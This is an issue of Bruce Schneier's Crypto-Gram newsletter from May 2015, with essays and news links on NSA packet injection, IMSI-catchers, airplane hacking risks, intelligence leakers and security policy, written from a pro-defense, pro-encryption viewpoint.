May 15, 2015
by Bruce Schneier
CTO, Resilient Systems, Inc.
A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.
For back issues, or to subscribe, visit <https://www.schneier.com/crypto-gram.html>.
You can read this issue on the web at <https://www.schneier.com/crypto-gram/archives/2015/…>. These same essays and news items appear in the “Schneier on Security” blog at <http://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.
In this issue:
- Admiral Rogers Speaking at the Joint Service Academy Cyber Security Summit
- The Further Democratization of QUANTUM
- The Further Democratization of Stingray
- Eighth Movie-Plot Threat Contest Semifinalists
- Hacking Airplanes
- Schneier News
- Counting the US Intelligence Community Leakers
- “Hinky” in Action
Admiral Mike Rogers gave the keynote address at the Joint Service Academy Cyber Security Summit yesterday at West Point. He started by explaining the four tenets of security that he thinks about.
First: partnerships. This includes government, civilian, everyone. Capabilities, knowledge, and insight of various groups, and aligning them to generate better outcomes to everyone. Ability to generate and share insight and knowledge, and to do that in a timely manner.
Second, innovation. It’s about much more than just technology. It’s about ways to organize, values, training, and so on. We need to think about innovation very broadly.
Third, technology. This is a technologically based problem, and we need to apply technology to defense as well.
Fourth, human capital. If we don’t get people working right, all of this is doomed to fail. We need to build security workforces inside and outside of military. We need to keep them current in a world of changing technology.
So, what is the Department of Defense doing? They’re investing in cyber, both because it’s a critical part of future fighting of wars and because of the mission to defend the nation.
Rogers then explained the five strategic goals listed in the recent DoD cyber strategy:
1. Build and maintain ready forces and capabilities to conduct cyberspace operations;
2. Defend the DoD information network, secure DoD data, and mitigate risks to DoD missions;
3. Be prepared to defend the U.S. homeland and U.S. vital interests from disruptive or destructive cyberattacks of significant consequence;
4. Build and maintain viable cyber options and plan to use those options to control conflict escalation and to shape the conflict environment at all stages;
5. Build and maintain robust international alliances and partnerships to deter shared threats and increase international security and stability.
Expect to see more detailed policy around these coming goals in the coming months.
What is the role of the US CyberCommand and the NSA in all of this? The CyberCommand has three missions related to the five strategic goals. They defend DoD networks. They create the cyber workforce. And, if directed, they defend national critical infrastructure.
At one point, Rogers said that he constantly reminds his people: “If it was designed by man, it can be defeated by man.” I hope he also tells this to the FBI when they talk about needing third-party access to encrypted communications.
All of this has to be underpinned by a cultural ethos that recognizes the importance of professionalism and compliance. Every person with a keyboard is both a potential asset and a threat. There needs to be well-defined processes and procedures within DoD, and a culture of following them.
What’s the threat dynamic, and what’s the nature of the world? The threat is going to increase; it’s going to get worse, not better; cyber is a great equalizer. Cyber doesn’t recognize physical geography. Four “prisms” to look at threat: criminals, nation states, hacktivists, groups wanting to do harm to the nation. This fourth group is increasing. Groups like ISIL are going to use the Internet to cause harm. Also embarrassment: releasing documents, shutting down services, and so on.
We spend a lot of time thinking about how to stop attackers from getting in; we need to think more about how to get them out once they’ve gotten in—and how to continue to operate even though they are in. (That was especially nice to hear, because that’s what I’m doing at my company.) Sony was a “wake-up call”: a nation-state using cyber for coercion. It was theft of intellectual property, denial of service, and destruction. And it was important for the US to acknowledge the attack, attribute it, and retaliate.
Last point: “Total force approach to the problem.” It’s not just about people in uniform. It’s about active duty military, reserve military, corporations, government contractors—everyone. We need to work on this together. “I am not interested in endless discussion…. I am interested in outcomes.” “Cyber is the ultimate team sport.” There’s no single entity, or single technology, or single anything, that will solve all of this. He wants to partner with the corporate world, and to do it in a way that benefits both.
First question was about the domains and missions of the respective services. Rogers talked about the inherent expertise that each service brings to the problem, and how to use cyber to extend that expertise—and the mission. The goal is to create a single integrated cyber force, but not a single service. Cyber occurs in a broader context, and that context is applicable to all the military services. We need to build on their individual expertises and contexts, and to apply it in an integrated way. Similar to how we do special forces.
Second question was about values, intention, and what’s at risk. Rogers replied that any structure for the NSA has to integrate with the nation’s values. He talked about the value of privacy. He also talked about “the security of the nation.” Both are imperatives, and we need to achieve both at the same time. The problem is that the nation is polarized; the threat is getting worse at the same time trust is decreasing. We need to figure out how to improve trust.
Third question was about DoD protecting commercial cyberspace. Rogers replied that the DHS is the lead organization in this regard, and DoD provides capability through that civilian authority. Any DoD partnership with the private sector will go through DHS.
Fourth question: How will DoD reach out to corporations, both established and start-ups? Many ways. By providing people to the private sectors. Funding companies, through mechanisms like the CIA’s In-Q-Tel. And some sort of innovation capability. Those are the three main vectors, but more important is that the DoD mindset has to change. DoD has traditionally been very insular; in this case, more partnerships are required.
Final question was about the NSA sharing security information in some sort of semi-classified way. Rogers said that there are lot of internal conversations about doing this. It’s important.
In all, nothing really new or controversial.
These comments were recorded—I can’t find them online now—and are on the record. Much of the rest of the summit was held under Chatham House Rules. I participated in a panel on “Crypto Wars 2015” with Matt Blaze and a couple of government employees.
I had a photo op with Admiral Rogers. The universe did not explode.
From my book Data and Goliath:
…when I was working with the Guardian on the Snowden documents, the one top-secret program the NSA desperately did not want us to expose was QUANTUM. This is the NSA’s program for what is called packet injection—basically, a technology that allows the agency to hack into computers. Turns out, though, that the NSA was not alone in its use of this technology. The Chinese government uses packet injection to attack computers. The cyberweapons manufacturer Hacking Team sells packet injection technology to any government willing to pay for it. Criminals use it. And there are hacker tools that give the capability to individuals as well. All of these existed before I wrote about QUANTUM. By using its knowledge to attack others rather than to build up the Internet’s defenses, the NSA has worked to ensure that *anyone* can use packet injection to hack into computers.
And that’s true. China’s Great Cannon uses QUANTUM. The ability to inject packets into the backbone is a powerful attack technology, and one that is increasingly being used by different attackers.
Even when technologies are developed inside the NSA, they don’t remain exclusive for long. Today’s top-secret programs become tomorrow’s PhD theses and the next day’s hacker tools.
I could have continued with “and the next day’s homework assignment,” because Michalis Polychronakis at Stony Book University has just assigned building a rudimentary QUANTUM tool as a homework assignment. It’s basically sniff, regexp match, swap sip/sport/dip/dport/syn/ack, set ack and push flags, and add the payload to create the malicious reply. Shouldn’t take more than a few hours to get it working. Of course, it would take a lot more to make it as sophisticated and robust as what the NSA and China have at their disposal, but the moral is that the tool is now in the hands of anyone who wants it. We need to make the Internet secure against this kind of attack instead of pretending that only the “good guys” can use it effectively.
End-to-end encryption is the solution. Nicholas Weaver wrote:
The only self defense from all of the above is universal encryption. Universal encryption is difficult and expensive, but unfortunately necessary.
Encryption doesn’t just keep our traffic safe from eavesdroppers, it protects us from attack. DNSSEC validation protects DNS from tampering, while SSL armors both email and web traffic.
There are many engineering and logistic difficulties involved in encrypting all traffic on the internet, but it’s one we must overcome if we are to defend ourselves from the entities that have weaponized the backbone.
And this is true in general. We have one network in the world today. Either we build our communications infrastructure for surveillance, or we build it for security. Either everyone gets to spy, or no one gets to spy. That’s our choice, with the Internet, with cell phone networks, with everything.
Chinese government use of packet injection:
Packet injection hacker tool:
China’s Great Cannon:
Packet injection homework assignment:
The democratization of cyberattack:
Stingray is the code name for an IMSI-catcher, which is basically a fake cell phone tower sold by Harris Corporation to various law enforcement agencies. (It’s actually just one of a series of devices with fish names—Amberjack is another—but it’s the name used in the media.) What is basically does is trick nearby cell phones into connecting to it. Once that happens, the IMSI-catcher can collect identification and location information of the phones and, in some cases, eavesdrop on phone conversations, text messages, and web browsing. (IMSI stands for International Mobile Subscriber Identity, which is the unique serial number your cell phone broadcasts so that the cellular system knows where you are.)
The use of IMSI-catchers in the US used to be a massive police secret. The FBI is so scared of explaining this capability in public that the agency makes local police sign nondisclosure agreements before using the technique, and has instructed them to lie about their use of it in court. When it seemed possible that local police in Sarasota, Florida, might release documents about Stingray cell phone interception equipment to plaintiffs in civil rights litigation against them, federal marshals seized the documents. More recently, St. Louis police dropped a case rather than talk about the technology in court. And Baltimore police admitted using Stingray over 25,000 times.
The truth is that it’s no longer a massive police secret. We now know a lot about IMSI-catchers. And the US government does not have a monopoly over the use of IMSI-catchers. I wrote in Data and Goliath:
There are dozens of these devices scattered around Washington, DC, and the rest of the country run by who-knows-what government or organization. Criminal uses are next.
From the Washington Post:
How rife? Turner and his colleagues assert that their specially outfitted smartphone, called the GSMK CryptoPhone, had detected signs of as many as 18 IMSI catchers in less than two days of driving through the region. A map of these locations, released Wednesday afternoon, looks like a primer on the geography of Washington power, with the surveillance devices reportedly near the White House, the Capitol, foreign embassies and the cluster of federal contractors near Dulles International Airport.
At the RSA Conference last week, Pwnie Express demonstrated their IMSI-catcher detector.
Building your own IMSI-catcher isn’t hard or expensive. At Def Con in 2010, researcher Chris Paget (now Kristin Paget) demonstrated a homemade IMSI-catcher. The whole thing cost $1,500, which is cheap enough for both criminals and nosy hobbyists.
It’s even cheaper and easier now. Anyone with a HackRF software-defined radio card can turn their laptop into an amateur IMSI-catcher. And this is why companies are building detectors into their security monitoring equipment.
Two points here. The first is that the FBI should stop treating Stingray like it’s a big secret, so we can start talking about policy.
The second is that we should stop pretending that this capability is exclusive to law enforcement, and recognize that we’re all at risk because of it. If we continue to allow our cellular networks to be vulnerable to IMSI-catchers, then we are all vulnerable to any foreign government, criminal, hacker, or hobbyist that builds one. If we instead engineer our cellular networks to be secure against this sort of attack, then we are safe against all those attackers.
We have one infrastructure. We can’t choose a world where the US gets to spy and the Chinese don’t. We get to choose a world where everyone can spy, or a world where no one can spy. We can be secure from everyone, or vulnerable to anyone.
Like QUANTUM, we have the choice of building our cellular infrastructure for security or for surveillance. Let’s choose security.
Government secrecy around Stingray:
Baltimore police using Stingray:
Stingray is not very secret; everyone is using them:
Building your own IMSI-catcher.
How Stingray illustrates the importance of a secure infrastructure.
Here’s an IMSI-catcher for sale on alibaba.com. At this point, every dictator in the world is using this technology against its own citizens.
They’re used extensively in China to send SMS spam without paying the telcos any fees.
On a Food Network show called Mystery Diners—episode 108, “Cabin Fever”—someone used an IMSI-catcher to intercept a phone call between two restaurant employees.
The new model of the IMSI-catcher from Harris Corporation is called Hailstorm. It has the ability to remotely inject malware into cell phones.
Other Harris IMSI-catcher codenames are Kingfish, Gossamer, Triggerfish, Amberjack, and Harpoon. The competitor is DRT, made by the Boeing subsidiary Digital Receiver Technology, Inc.
Here’s an IMSI-catcher called Piranha, sold by the Israeli company Rayzone Corp. It claims to work on GSM 2G, 3G, and 4G networks (plus CDMA, of course). The basic Stingray only works on GSM 2G networks, and intercepts phones on the more modern networks by forcing them to downgrade to the 2G protocols. We believe that the more modern ISMI catchers also work against 3G and 4G networks.
Dan Geer proposes some techniques for figuring out how many vulnerabilities there are in software.
The Congressional Research Service has released a report on the no-fly list and current litigation alleging that it violates due process.
New operational information on the US’s drone program, published by the Intercept and Der Spiegel.
A hacker on a plane waiting to take off tweeted about airplane software vulnerabilities. He was detained by the FBI when he landed. Yes, the real issue here is the chilling effects on security research. Security researchers pointing out security flaws is a good thing, and should be encouraged. But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There’s some serious surveillance going on. Now, it is possible that Roberts was being specifically monitored. He is already known as a security researcher who is working on avionics hacking. But still…
An incredibly insecure voting machine.
Federal Trade Commissioner Julie Brill makes some good comments on obscurity.
The history of lockpicking.
A drug dealer claims that the police leaned him over an 18th floor balcony and threatened to kill him if he didn’t give up his password. One of the policemen involved corroborates this story.
This is what’s known as “rubber-hose cryptanalysis,” well-described in this xkcd cartoon.
Interesting article about the surveillance and security issues involving remote proctoring of tests.
Google’s new Chrome extension: Password Alert.
New research paper: “New methods for examining expertise in burglars in natural and simulated environments: preliminary findings”:
This digital privacy awareness video is very well done.
Fox-IT has a blog post (and has published Snort rules) on how to detect man-on-the-side Internet attacks like the NSA’s QUANTUMINSERT.
QUANTUMINSERT detection for Bro, Snort, and Suricata:
The NSA’s voice-to text capabilities: a new article from the Intercept based on the Snowden documents.
In this long article on the 2005 assassination of Rafik Hariri in Beirut, there’s a detailed section on what the investigators were able to learn from the cell phone metadata (Section 6 of the article).
Matthew Cole explains how the Italian police figured out how the CIA kidnapped Abu Omar in Milan. Interesting use of cell phone metadata, showing how valuable it is for intelligence purposes.
Interesting research on online dating scams.
Stealing a billion by owning a bank.
Cybersecurity summer camps for high-school kids.
Ross Anderson summarizes a meeting in Princeton where Edward Snowden was “present.”
Anyone can design a cipher that he himself cannot break. This is why you should uniformly distrust amateur cryptography, and why you should only use published algorithms that have withstood broad cryptanalysis. All cryptographers know this, but non-cryptographers do not. And this is why we repeatedly see bad amateur cryptography in fielded systems. The latest is the cryptography in the Open Smart Grid Protocol, which is so bad as to be laughable.
My still-relevant 1998 essay: “Memo to the Amateur Cipher Designer.”
And my 1999 essay on cryptographic snake oil.
This 1947 document describes a German machine to cryptanalyze the American M-209 mechanical encryption machine. I can’t figure out anything about how it works.
More information on German attacks on the M-209:
On April 1, I announced the Eighth Movie Plot Threat Contest: demonstrate the evils of encryption.
Not a whole lot of good submissions this year. Possibly this contest has run its course, and there’s not a whole lot of interest left. On the other hand, it’s heartening to know that there aren’t a lot of encryption movie-plot threats out there.
Anyway, here are the semifinalists.
1: Child pornographers.
2: Bombing the NSA.
4: Terrorists and a vaccine.
5: Election systems.
Cast your vote by number here; voting closes at the end of the month.
Imagine this: A terrorist hacks into a commercial airplane from the ground, takes over the controls from the pilots and flies the plane into the ground. It sounds like the plot of some “Die Hard” reboot, but it’s actually one of the possible scenarios outlined in a new Government Accountability Office report on security vulnerabilities in modern airplanes.
It’s certainly possible, but in the scheme of Internet risks I worry about, it’s not very high. I’m more worried about the more pedestrian attacks against more common Internet-connected devices. I’m more worried, for example, about a multination cyber arms race that stockpiles capabilities such as this, and prioritizes attack over defense in an effort to gain relative advantage. I worry about the democratization of cyberattack techniques, and who might have the capabilities currently reserved for nation-states. And I worry about a future a decade from now if these problems aren’t addressed.
First, the airplanes. The problem the GAO identifies is one computer security experts have talked about for years. Newer planes such as the Boeing 787 Dreamliner and the Airbus A350 and A380 have a single network that is used both by pilots to fly the plane and passengers for their Wi-Fi connections. The risk is that a hacker sitting in the back of the plane, or even one on the ground, could use the Wi-Fi connection to hack into the avionics and then remotely fly the plane.
The report doesn’t explain how someone could do this, and there are currently no known vulnerabilities that a hacker could exploit. But all systems are vulnerable—we simply don’t have the engineering expertise to design and build perfectly secure computers and networks—so of course we believe this kind of attack is theoretically possible.
Previous planes had separate networks, which is much more secure.
As terrifying as this movie-plot threat is—and it has been the plot of several recent works of fiction—this is just one example of an increasingly critical problem: As the computers already critical to running our infrastructure become connected, our vulnerability to cyberattack grows. We’ve already seen vulnerabilities in baby monitors, cars, medical equipment and all sorts of other Internet-connected devices. In February, Toyota recalled 1.9 million Prius cars because of a software vulnerability. Expect similar vulnerabilities in our smart thermostats, smart light bulbs and everything else connected to the smart power grid. The Internet of Things will bring computers into every aspect of our life and society. Those computers will be on the network and will be vulnerable to attack.
And because they’ll all be networked together, a vulnerability in one device will affect the security of everything else. Right now, a vulnerability in your home router can compromise the security of your entire home network. A vulnerability in your Internet-enabled refrigerator can reportedly be used as a launching pad for further attacks.
Future attacks will be exactly like what’s happening on the Internet today with your computer and smartphones, only they will be with everything. It’s all one network, and it’s all critical infrastructure.
Some of these attacks will require sufficient budget and organization to limit them to nation-state aggressors. But that’s hardly comforting. North Korea is last year believed to have launched a massive cyberattack against Sony Pictures. Last month, China used a cyberweapon called the “Great Cannon” against the website GitHub. In 2010, the U.S. and Israeli governments launched a sophisticated cyberweapon called Stuxnet against the Iranian Natanz nuclear power plant; it used a series of vulnerabilities to cripple centrifuges critical for separating nuclear material. In fact, the United States has done more to weaponize the Internet than any other country.
Governments only have a fleeting advantage over everyone else, though. Today’s top-secret National Security Agency programs become tomorrow’s Ph.D. theses and the next day’s hacker’s tools. So while remotely hacking the 787 Dreamliner’s avionics might be well beyond the capabilities of anyone except Boeing engineers today, that’s not going to be true forever.
What this all means is that we have to start thinking about the security of the Internet of Things—whether the issue in question is today’s airplanes or tomorrow’s smart clothing. We can’t repeat the mistakes of the early days of the PC and then the Internet, where we initially ignored security and then spent years playing catch-up. We have to build security into everything that is going to be connected to the Internet.
This is going to require both significant research and major commitments by companies. It’s also going to require legislation mandating certain levels of security on devices connecting to the Internet, and at network providers that make the Internet work. This isn’t something the market can solve on its own, because there are just too many incentives to ignore security and hope that someone else will solve it.
As a nation, we need to prioritize defense over offense. Right now, the NSA and U.S. Cyber Command have a strong interest in keeping the Internet insecure so they can better eavesdrop on and attack our enemies. But this prioritization cuts both ways: We can’t leave others’ networks vulnerable without also leaving our own vulnerable. And as one of the most networked countries on the planet, we are highly vulnerable to attack. It would be better to focus the NSA’s mission on defense and harden our infrastructure against attack.
Remember the GAO’s nightmare scenario: A hacker on the ground exploits a vulnerability in the airplane’s Wi-Fi system to gain access to the airplane’s network. Then he exploits a vulnerability in the firewall that separates the passengers’ network from the avionics to gain access to the flight controls. Then he uses other vulnerabilities both to lock the pilots out of the cockpit controls and take control of the plane himself.
It’s a scenario made possible by insecure computers and insecure networks. And while it might take a government-led secret project on the order of Stuxnet to pull it off today, that won’t always be true.
Of course, this particular movie-plot threat might never become a real one. But it is almost certain that some equally unlikely scenario will. I just hope we have enough security expertise to deal with whatever it ends up being.
This essay originally appeared on CNN.com.
Older commentary about these vulnerabilities:
Other vulnerabilities in connected devices:
North Korea attacks Sony:
China attacks GitHub:
How the US has weaponized the Internet:
I’m speaking at Sikkerhetsdagen i Troms in Norway—via Skype—on 5/28.
I’m speaking at Info Security Europe in London on 6/3.
I’m speaking at AusCERT in Queensland—via Skype—on 6/5.
I’m speaking at the ISSA Security Summit in Los Angeles on 6/4.
You can now order signed copies of Data and Goliath from my website.
It’s getting hard to keep track of the US intelligence community leakers without a scorecard. So here’s my attempt:
Leaker #1: Edward Snowden.
Leaker #2: The person who leaked secret documents to Jake Appelbaum, Laura Poitras, and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. This might be the “high-ranking NSA employee in Germany”—or maybe that’s someone else entirely.
Leaker #3: “A source in the intelligence community,” according to the Intercept, who leaked information about the Terrorist Screening Database, the “second leaker” from the movie Citizen Four. Greenwald promises a lot from him: “Snowden, at a meeting with Greenwald in Moscow, expresses surprise at the level of information apparently coming from this new source. Greenwald, fearing he will be overheard, writes the details on scraps of paper.” We have seen nothing since, though. This is probably the leaker the FBI identified, although we have heard nothing further about that, either.
Leaker #4: Someone who is leaking CIA documents.
Leaker #5: The person who leaked secret information about WTO spying to the Intercept and the New Zealand Herald. This isn’t Snowden; the Intercept is very careful to identify him as the source when it writes about the documents he provided. Neither publication give any indication of how it was obtained. This might be Leaker #2, since it contains X-KEYSCORE rules.
Leaker #6: The person who just leaked secret information about the US drone program to the Intercept and Der Spiegel. This also might be Leaker #2, since there is a Germany connection. According to the Intercept: “The slides were provided by a source with knowledge of the U.S. government’s drone program who declined to be identified because of fears of retribution.” That implies someone new.
Am I missing anyone?
Harvard Law School professor Yochai Benkler has written an excellent law review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing. I wrote about the value of whistleblowers in Data and Goliath.
Way back in June 2013, Glenn Greenwald said that “courage is contagious.” He seems to be correct.
This essay was originally published on Lawfare:
In Beyond Fear, I wrote about trained officials recognizing “hinky” and how it differs from profiling:
Ressam had to clear customs before boarding the ferry. He had fake ID, in the name of Benni Antoine Noris, and the computer cleared him based on this ID. He was allowed to go through after a routine check of his car’s trunk, even though he was wanted by the Canadian police. On the other side of the Strait of Juan de Fuca, at Port Angeles, Washington, Ressam was approached by U.S. customs agent Diana Dean, who asked some routine questions and then decided that he looked suspicious. He was fidgeting, sweaty, and jittery. He avoided eye contact. In Dean’s own words, he was acting “hinky.” More questioning—there was no one else crossing the border, so two other agents got involved—and more hinky behavior. Ressam’s car was eventually searched, and he was finally discovered and captured. It wasn’t any one thing that tipped Dean off; it was everything encompassed in the slang term “hinky.” But the system worked. The reason there wasn’t a bombing at LAX around Christmas in 1999 was because a knowledgeable person was in charge of security and paying attention.
I wrote about this again in 2007:
The key difference is expertise. People trained to be alert for something hinky will do much better than any profiler, but people who have no idea what to look for will do no better than random.
Here’s another story from last year:
On April 28, 2014, Yusuf showed up alone at the Minneapolis Passport Agency and applied for an expedited passport. He wanted to go “sightseeing” in Istanbul, where he was planning to meet someone he recently connected with on Facebook, he allegedly told the passport specialist.
“It’s a guy, just a friend,” he told the specialist, according to court documents.
But when the specialist pressed him for more information about his “friend” in Istanbul and his plans while there, Yusuf couldn’t offer any details, the documents allege.
“[He] became visibly nervous, more soft-spoken, and began to avoid eye contact,” the documents say. “Yusuf did not appear excited or happy to be traveling to Turkey for vacation.”
In fact, the passport specialist “found his interaction with Yusuf so unusual that he contacted his supervisor who, in turn, alerted the FBI to Yusuf’s travel,” according to the court documents.
This is what works. Not profiling. Not bulk surveillance. Not defending against any particular tactics or targets. In the end, this is what keeps us safe.
Me in 2005:
Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <https://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.
Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of 12 books—including “Liars and Outliers: Enabling the Trust Society Needs to Survive”—as well as hundreds of articles, essays, and academic papers. His influential newsletter “Crypto-Gram” and his blog “Schneier on Security” are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation’s Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Chief Technology Officer at Resilient Systems, Inc. See <https://www.schneier.com>.
Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of Resilient Systems, Inc.
Copyright (c) 2015 by Bruce Schneier.